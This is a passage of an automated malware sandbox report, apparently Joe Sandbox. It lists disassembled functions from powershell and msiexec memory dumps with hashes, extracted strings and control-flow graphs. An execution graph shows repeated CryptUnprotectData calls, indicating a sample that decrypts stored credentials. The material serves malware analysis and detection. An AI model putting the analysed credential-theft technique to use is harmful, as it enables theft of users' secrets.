                                                                                                                                                                                    • Opcode ID: c1bc0e1a4c1f5dced3142a0bb6b541f180a18c47a139b574d71219f2db081caa
                                                                                                                                                                                    • Instruction ID: da51e15108f37b76a5f734f39c50d9cc6b869dfd443d2b82fb56af113c4d0d32
                                                                                                                                                                                    • Opcode Fuzzy Hash: c1bc0e1a4c1f5dced3142a0bb6b541f180a18c47a139b574d71219f2db081caa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 264127B1B0430AAFDB555BB498106BE7BE2AFC1204F1485AAD505CF291EF36C895C7E2
                                                                                                                                                                                    Function 070A56B0 Relevance: 6.4, Strings: 5, Instructions: 130COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-3272787073
                                                                                                                                                                                    • Opcode ID: f92cf434ba71124abc4f0a41ae27ed78b4da3c2f3bf5c7ee19cf138f84601bdd
                                                                                                                                                                                    • Instruction ID: 6626de3431e33fae5888063331d543fe805b45a715b6269b5ade5c47cbe31c88
                                                                                                                                                                                    • Opcode Fuzzy Hash: f92cf434ba71124abc4f0a41ae27ed78b4da3c2f3bf5c7ee19cf138f84601bdd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 58414DB1F00246FFCB198EA9AC0416EB7E1BF81220F24476BD821DF251DB35C969C751
                                                                                                                                                                                    Function 070AA7F0 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-3997570045
                                                                                                                                                                                    • Opcode ID: 2b41c54e7000b451e910089deaf579ec6fa5d67a2ded01287948242e98feba25
                                                                                                                                                                                    • Instruction ID: 4010beb84db30c8abaadb9c2ccec3f0a0d4d99dfc347de182605cf6003154694
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b41c54e7000b451e910089deaf579ec6fa5d67a2ded01287948242e98feba25
                                                                                                                                                                                    • Instruction Fuzzy Hash: 983102F1B00206FFDB648E84CA44FAAB7E1AF45760F19C26AD8255F2D0CB32D945CB91
                                                                                                                                                                                    Function 08FA0881 Relevance: 6.3, Strings: 5, Instructions: 80COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: tP^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-324510305
                                                                                                                                                                                    • Opcode ID: 0c02d4215001009e75caa1f9fb7aed5508089f7969fbdc358caf3abb3f44c49b
                                                                                                                                                                                    • Instruction ID: b7a1a30bc0a5485a261a09a3500e98c82020687aa9ef74d45da847bc0039bf2c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c02d4215001009e75caa1f9fb7aed5508089f7969fbdc358caf3abb3f44c49b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D21D1F6E00619CFEB248E74E944A6A77F4AFC4732B24406AE914AF351DF31D904C7A1
                                                                                                                                                                                    Function 070ADA48 Relevance: 5.5, Strings: 4, Instructions: 476COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (o^q$(o^q$(o^q$(o^q
                                                                                                                                                                                    • API String ID: 0-1978863864
                                                                                                                                                                                    • Opcode ID: b5b2768be2c54861564ec3a93e7541c7efd3914a08c1896871ca904f11d964f2
                                                                                                                                                                                    • Instruction ID: 571fca0d34df7ae9590cac8872138871691753ff9e8dbaa9c14bd783a7ac5999
                                                                                                                                                                                    • Opcode Fuzzy Hash: b5b2768be2c54861564ec3a93e7541c7efd3914a08c1896871ca904f11d964f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95F14971704346EFDB559FA8C8047AABBE2EF81310F1486AAE415CFA99CB32D845C791
                                                                                                                                                                                    Function 070ABA60 Relevance: 5.4, Strings: 4, Instructions: 398COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$x.kk$-kk
                                                                                                                                                                                    • API String ID: 0-3904263387
                                                                                                                                                                                    • Opcode ID: 5a08f53ec4c606607553d76dc653d42c594ecb8d092cd15cdff55b418c8bd97d
                                                                                                                                                                                    • Instruction ID: 8ebcbb2708a74727f31157d1379928bd9b1cb53a499744a3849f5d3c470ce2a3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a08f53ec4c606607553d76dc653d42c594ecb8d092cd15cdff55b418c8bd97d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D0249B4A002199FDB24DB64CD51B9EBBF2BB89304F5081E5D9096B351CB72EE81CF90
                                                                                                                                                                                    Function 08FA0048 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (fzl$(fzl$(fzl$(fzl
                                                                                                                                                                                    • API String ID: 0-3225199445
                                                                                                                                                                                    • Opcode ID: 5b77e5ffd6c4102cefed9a3e4e5f973fb8c2f94c37e35fdca02bb59316e6a3ba
                                                                                                                                                                                    • Instruction ID: ece1eb0aaecc8acae71fdf8dd09d9b88bc18971950d86ccab0bc412ad5fa8346
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b77e5ffd6c4102cefed9a3e4e5f973fb8c2f94c37e35fdca02bb59316e6a3ba
                                                                                                                                                                                    • Instruction Fuzzy Hash: 84C16EB4E00604DFDB14CFA8D540AAAB7F2BF88325F148569D805AB755CF32EC46CB91
                                                                                                                                                                                    Function 070A5F78 Relevance: 5.3, Strings: 4, Instructions: 279COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 84xl$84xl$tP^q$tP^q
                                                                                                                                                                                    • API String ID: 0-357183423
                                                                                                                                                                                    • Opcode ID: 77be3e8faae2360e3c9f52b229868207d986313bbb456951089be6a68ca6bb78
                                                                                                                                                                                    • Instruction ID: 60f03ee3d18664624abe039fc34896ab4ada8e7fb233761148557dc173638d5a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 77be3e8faae2360e3c9f52b229868207d986313bbb456951089be6a68ca6bb78
                                                                                                                                                                                    • Instruction Fuzzy Hash: C69149B1B00306AFCB545EA9C954A7ABFF6AF81710F1C897AD915CF391CA32D844C7A1
                                                                                                                                                                                    Function 070A9908 Relevance: 5.1, Strings: 4, Instructions: 132COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: ,Szl$,Szl$p5jk$xSzl
                                                                                                                                                                                    • API String ID: 0-1021602235
                                                                                                                                                                                    • Opcode ID: aac0ce6875a3a9cdfd4296ebf84a002dbfe1307b9e6a89d942356a412b01576c
                                                                                                                                                                                    • Instruction ID: 5fc5b775548b54c48e9cd6ae1e99c04f0411f03d651eadcc96bbf44608bcc356
                                                                                                                                                                                    • Opcode Fuzzy Hash: aac0ce6875a3a9cdfd4296ebf84a002dbfe1307b9e6a89d942356a412b01576c
                                                                                                                                                                                    • Instruction Fuzzy Hash: D14148B1B1430ABFCB509BAC9401B6EBBE69FD6310F14827BD549DB351DA31E881C792
                                                                                                                                                                                    Function 070A36A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-2125118731
                                                                                                                                                                                    • Opcode ID: ce41a4c917782df3517b3df22e0a524e8716c4fb19c061141d9144308734ed14
                                                                                                                                                                                    • Instruction ID: 471888ff86c6ebc8f025257ce2f680732fb9326fbafa406a26f15bee7419a619
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce41a4c917782df3517b3df22e0a524e8716c4fb19c061141d9144308734ed14
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E216BF171030A7BDB7899AA5C05B2BF6DA5BC2710F24853AE405CF395DD35C8458360
                                                                                                                                                                                    Function 070A0309 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-2049395529
                                                                                                                                                                                    • Opcode ID: 3fd569fc9415f2fa62beb80dbd8564cf539242725cc065b73032b3f58e13cc27
                                                                                                                                                                                    • Instruction ID: 621861820739bd51d9c3e8d52e752e43a5977bf4ecb3cff6121615a43b628bd4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fd569fc9415f2fa62beb80dbd8564cf539242725cc065b73032b3f58e13cc27
                                                                                                                                                                                    • Instruction Fuzzy Hash: F3017C62A4A3CA9FC71B57B818201197FF69E9395072A41EBC081DF367DE158C4AC7A3

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:8.8%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                    Signature Coverage:21.2%
                                                                                                                                                                                    Total number of Nodes:33
                                                                                                                                                                                    Total number of Limit Nodes:2
                                                                                                                                                                                    execution_graph 26429 307e018 26430 307e024 26429->26430 26434 24017b69 26430->26434 26438 24017b78 26430->26438 26431 307e1d4 26436 24017b70 26434->26436 26435 24018029 26435->26431 26436->26435 26442 24018431 26436->26442 26440 24017b9a 26438->26440 26439 24018029 26439->26431 26440->26439 26441 24018431 CryptUnprotectData 26440->26441 26441->26440 26443 24018440 26442->26443 26447 24018a59 26443->26447 26455 24018a68 26443->26455 26444 240184b0 26444->26436 26448 24018a8d 26447->26448 26449 24018b41 26447->26449 26448->26449 26452 24018a59 CryptUnprotectData 26448->26452 26453 24018a68 CryptUnprotectData 26448->26453 26463 24018c4a 26448->26463 26467 240187a8 26449->26467 26452->26449 26453->26449 26456 24018a8d 26455->26456 26459 24018b41 26455->26459 26456->26459 26460 24018a59 CryptUnprotectData 26456->26460 26461 24018a68 CryptUnprotectData 26456->26461 26462 24018c4a CryptUnprotectData 26456->26462 26457 240187a8 CryptUnprotectData 26458 24018d0d 26457->26458 26458->26444 26459->26457 26460->26459 26461->26459 26462->26459 26464 24018c5d 26463->26464 26465 240187a8 CryptUnprotectData 26464->26465 26466 24018d0d 26465->26466 26466->26449 26468 24018ef8 CryptUnprotectData 26467->26468 26469 24018d0d 26468->26469 26469->26444

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 030729EC Relevance: 5.7, Strings: 4, Instructions: 728COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 108 30729ec-30729f6 110 3072981-3072990 108->110 111 30729f8-3072a3b 108->111 113 3072997-30729c8 110->113 116 3072a5d-3072aac 111->116 117 3072a3d-3072a5c 111->117 122 3072ac7-3072acf 116->122 123 3072aae-3072ab5 116->123 126 3072ad2-3072ae6 122->126 124 3072ab7-3072abc 123->124 125 3072abe-3072ac5 123->125 124->126 125->126 129 3072afc-3072b04 126->129 130 3072ae8-3072aef 126->130 133 3072b06-3072b0a 129->133 131 3072af5-3072afa 130->131 132 3072af1-3072af3 130->132 131->133 132->133 135 3072b0c-3072b21 133->135 136 3072b6a-3072b6d 133->136 135->136 142 3072b23-3072b26 135->142 137 3072bb5-3072bbb 136->137 138 3072b6f-3072b84 136->138 140 30736b6 137->140 141 3072bc1-3072bc3 137->141 138->137 145 3072b86-3072b8a 138->145 148 30736bb-3073ca5 140->148 141->140 143 3072bc9-3072bce 141->143 146 3072b45-3072b63 call 30702c8 142->146 147 3072b28-3072b2a 142->147 149 3073664-3073668 143->149 150 3072bd4 143->150 151 3072b92-3072bb0 call 30702c8 145->151 152 3072b8c-3072b90 145->152 146->136 147->146 153 3072b2c-3072b2f 147->153 155 307366f-30736b5 149->155 156 307366a-307366d 149->156 150->149 151->137 152->137 152->151 153->136 158 3072b31-3072b43 153->158 156->148 156->155 158->136 158->146
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                                                                                                    • API String ID: 0-2732225958
                                                                                                                                                                                    • Opcode ID: 8fbdc2edc8914fc53a19bd0cd429e824c68210725d34593e5f6ca3cfdc9de2c6
                                                                                                                                                                                    • Instruction ID: c8cd5e51ac8d6471821bc76e8ec5b3fc1149121745b87010cd742729cfc6c74a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fbdc2edc8914fc53a19bd0cd429e824c68210725d34593e5f6ca3cfdc9de2c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 23426032806756CBCB15CF38CC4529ABFB1EF46224B2D4596C4998B607E739B730CB96
                                                                                                                                                                                    Function 0307C468 Relevance: 3.9, Strings: 3, Instructions: 196COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 278 307c468-307c471 279 307c473-307c498 278->279 280 307c3fc-307c414 278->280 281 307c49f-307c4e7 279->281 282 307c49a 279->282 280->278 287 307c4ef-307c4fe call 30741a0 281->287 282->281 290 307c503-307c57c call 3073cc0 287->290 296 307c583-307c5a4 call 3075658 290->296 297 307c57e 290->297 299 307c5a9-307c5b4 296->299 297->296 300 307c5b6 299->300 301 307c5bb-307c5bf 299->301 300->301 302 307c5c4-307c5cb 301->302 303 307c5c1-307c5c2 301->303 305 307c5d2-307c5e0 302->305 306 307c5cd 302->306 304 307c5e3-307c627 303->304 310 307c68d-307c6a4 304->310 305->304 306->305 312 307c6a6-307c6cb 310->312 313 307c629-307c63f 310->313 320 307c6e3 312->320 321 307c6cd-307c6e2 312->321 317 307c641-307c64d 313->317 318 307c669 313->318 322 307c657-307c65d 317->322 323 307c64f-307c655 317->323 319 307c66f-307c68c 318->319 319->310 321->320 324 307c667 322->324 323->324 324->319
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: PH^q$PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-70248665
                                                                                                                                                                                    • Opcode ID: c361799260d718b010f8dc48d5a8057fb562afe472df30b67972d6e182e7b578
                                                                                                                                                                                    • Instruction ID: 2bdd4727ff410ae413bdde398bb38592c8b6d93ed8f609e3881c18bd2dd799a3
                                                                                                                                                                                    • Opcode Fuzzy Hash: c361799260d718b010f8dc48d5a8057fb562afe472df30b67972d6e182e7b578
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3291E674E01208CFEB14DFAAD884A9DFBF2BF89300F149069D819AB364DB349985CF54
                                                                                                                                                                                    Function 21A59C18 Relevance: 3.5, Strings: 1, Instructions: 2262COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: K
                                                                                                                                                                                    • API String ID: 0-856455061
                                                                                                                                                                                    • Opcode ID: d5d6cc720692c38b0c263582897e5ed9c808249db26266bd3c9cd92ed064bc68
                                                                                                                                                                                    • Instruction ID: 292dcc6f43898397802540e500326337313abff5dfa339841ffaf3e12c7ad454
                                                                                                                                                                                    • Opcode Fuzzy Hash: d5d6cc720692c38b0c263582897e5ed9c808249db26266bd3c9cd92ed064bc68
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1233F571D146198EDB51EF68C854A9DFBB1FF99300F10D69AE4487B221EB70AAC4CF81
                                                                                                                                                                                    Function 03073E09 Relevance: 2.9, Strings: 2, Instructions: 431COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 764 3073e09-3073e25 765 3073e27-3073e29 764->765 766 3073e2e-3073e3e 764->766 767 30740cc-30740d3 765->767 768 3073e45-3073e55 766->768 769 3073e40 766->769 771 30740b3-30740c1 768->771 772 3073e5b-3073e69 768->772 769->767 775 30740d4-30741ba 771->775 777 30740c3-30740c7 call 30702c8 771->777 772->775 776 3073e6f 772->776 846 30741c1-3074274 call 3072358 call 3072368 call 3072378 call 3072388 775->846 847 30741bc 775->847 776->775 778 3074067-3074082 call 30702d8 776->778 779 30740a7-30740b1 776->779 780 3073f26-3073f47 776->780 781 3074084-30740a5 call 30728f0 776->781 782 3073f00-3073f21 776->782 783 307400e-3074034 776->783 784 3073e8d-3073eae 776->784 785 3073f4c-3073f6d 776->785 786 3073fcc-3074009 776->786 787 3073e76-3073e88 776->787 788 3073eb3-3073ed5 776->788 789 3073f72-3073f9a 776->789 790 3073f9f-3073fc7 776->790 791 3073eda-3073efb 776->791 792 3074039-3074065 776->792 777->767 778->767 779->767 780->767 781->767 782->767 783->767 784->767 785->767 786->767 787->767 788->767 789->767 790->767 791->767 792->767 860 3074279-307435f call 30702e4 846->860 847->846
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Xbq$$^q
                                                                                                                                                                                    • API String ID: 0-1593437937
                                                                                                                                                                                    • Opcode ID: 5cf7544cfa50999c8ac2dfcf7e5a93eb2352e3177379f862b4a61fd348e992b3
                                                                                                                                                                                    • Instruction ID: bb5f275e6134534df0bfaa0223f6a65a9ecc296ff296ffa64b2c4980a88303fc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cf7544cfa50999c8ac2dfcf7e5a93eb2352e3177379f862b4a61fd348e992b3
                                                                                                                                                                                    • Instruction Fuzzy Hash: CCF15074F01218DFDB08DFB9D4945AEBBB2FF88310B148569D406AB358DF359902CB99
                                                                                                                                                                                    Function 0307C147 Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 959 307c147-307c158 960 307c184 959->960 961 307c15a-307c172 959->961 962 307c186-307c18a 960->962 965 307c174-307c179 961->965 966 307c17b-307c17e 961->966 965->962 967 307c180-307c182 966->967 968 307c18b-307c199 966->968 967->960 967->961 970 307c124-307c127 968->970 971 307c19b-307c19d 968->971 973 307c128-307c129 970->973 972 307c19f-307c1a1 971->972 971->973 974 307c1a3-307c1c8 972->974 975 307c12c-307c145 972->975 976 307c1cf-307c2ac call 30741a0 call 3073cc0 974->976 977 307c1ca 974->977 989 307c2b3-307c2e4 call 3075658 976->989 990 307c2ae 976->990 977->976 993 307c2e6 989->993 994 307c2eb-307c2ef 989->994 990->989 993->994 995 307c2f4-307c2fb 994->995 996 307c2f1-307c2f2 994->996 998 307c302-307c310 995->998 999 307c2fd 995->999 997 307c313-307c357 996->997 1003 307c3bd-307c3d4 997->1003 998->997 999->998 1005 307c3d6-307c3fb 1003->1005 1006 307c359-307c36f 1003->1006 1013 307c413-307c471 1005->1013 1014 307c3fd-307c400 1005->1014 1010 307c371-307c37d 1006->1010 1011 307c399 1006->1011 1015 307c387-307c38d 1010->1015 1016 307c37f-307c385 1010->1016 1012 307c39f-307c3bc 1011->1012 1012->1003 1023 307c473-307c498 1013->1023 1024 307c3fc-307c400 1013->1024 1018 307c40a-307c412 1014->1018 1017 307c397 1015->1017 1016->1017 1017->1012 1018->1013 1025 307c49f-307c57c call 30741a0 call 3073cc0 1023->1025 1026 307c49a 1023->1026 1024->1018 1036 307c583-307c5a4 call 3075658 1025->1036 1037 307c57e 1025->1037 1026->1025 1039 307c5a9-307c5b4 1036->1039 1037->1036 1040 307c5b6 1039->1040 1041 307c5bb-307c5bf 1039->1041 1040->1041 1042 307c5c4-307c5cb 1041->1042 1043 307c5c1-307c5c2 1041->1043 1045 307c5d2-307c5e0 1042->1045 1046 307c5cd 1042->1046 1044 307c5e3-307c627 1043->1044 1050 307c68d-307c6a4 1044->1050 1045->1044 1046->1045 1052 307c6a6-307c6cb 1050->1052 1053 307c629-307c63f 1050->1053 1060 307c6e3 1052->1060 1061 307c6cd-307c6e2 1052->1061 1057 307c641-307c64d 1053->1057 1058 307c669 1053->1058 1062 307c657-307c65d 1057->1062 1063 307c64f-307c655 1057->1063 1059 307c66f-307c68c 1058->1059 1059->1050 1061->1060 1064 307c667 1062->1064 1063->1064 1064->1059
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                                                    • Opcode ID: d8bc28f17c14a746be38a58b5c93f813c2b1fbc618223088d780f74a864bd498
                                                                                                                                                                                    • Instruction ID: 77f187aadece1836ef82e4daad68f55a1742b6d79ab6a1f18607cfd81f33b227
                                                                                                                                                                                    • Opcode Fuzzy Hash: d8bc28f17c14a746be38a58b5c93f813c2b1fbc618223088d780f74a864bd498
                                                                                                                                                                                    • Instruction Fuzzy Hash: ECA10974E01218DFEB14DFAAD884A9DFBF2BF89310F14806AE409AB365DB349845CF54
                                                                                                                                                                                    Function 03075362 Relevance: 2.7, Strings: 2, Instructions: 193COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1209 3075362-30753a0 1210 30753a7-3075484 call 30741a0 call 3073cc0 1209->1210 1211 30753a2 1209->1211 1221 3075486 1210->1221 1222 307548b-30754a9 1210->1222 1211->1210 1221->1222 1252 30754ac call 3075649 1222->1252 1253 30754ac call 3075658 1222->1253 1223 30754b2-30754bd 1224 30754c4-30754c8 1223->1224 1225 30754bf 1223->1225 1226 30754cd-30754d4 1224->1226 1227 30754ca-30754cb 1224->1227 1225->1224 1229 30754d6 1226->1229 1230 30754db-30754e9 1226->1230 1228 30754ec-3075530 1227->1228 1234 3075596-30755ad 1228->1234 1229->1230 1230->1228 1236 3075532-3075548 1234->1236 1237 30755af-30755d4 1234->1237 1240 3075572 1236->1240 1241 307554a-3075556 1236->1241 1243 30755d6-30755eb 1237->1243 1244 30755ec 1237->1244 1247 3075578-3075595 1240->1247 1245 3075560-3075566 1241->1245 1246 3075558-307555e 1241->1246 1243->1244 1248 3075570 1245->1248 1246->1248 1247->1234 1248->1247 1252->1223 1253->1223
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                                                    • Opcode ID: f37251a24f45765c47ec31e5748a0ef8a3f7dd46a36f35a5d3ee6415bdcbde8c
                                                                                                                                                                                    • Instruction ID: 3d146183266c2dca0ad106f34ada7d8ed035d9ff3a4fed339b57588d65d31bd2
                                                                                                                                                                                    • Opcode Fuzzy Hash: f37251a24f45765c47ec31e5748a0ef8a3f7dd46a36f35a5d3ee6415bdcbde8c
                                                                                                                                                                                    • Instruction Fuzzy Hash: CF91E474E01218CFDB14CFAAD994ADDBBF2BF89300F14806AE808AB365DB349945CF54
                                                                                                                                                                                    Function 0307CA08 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
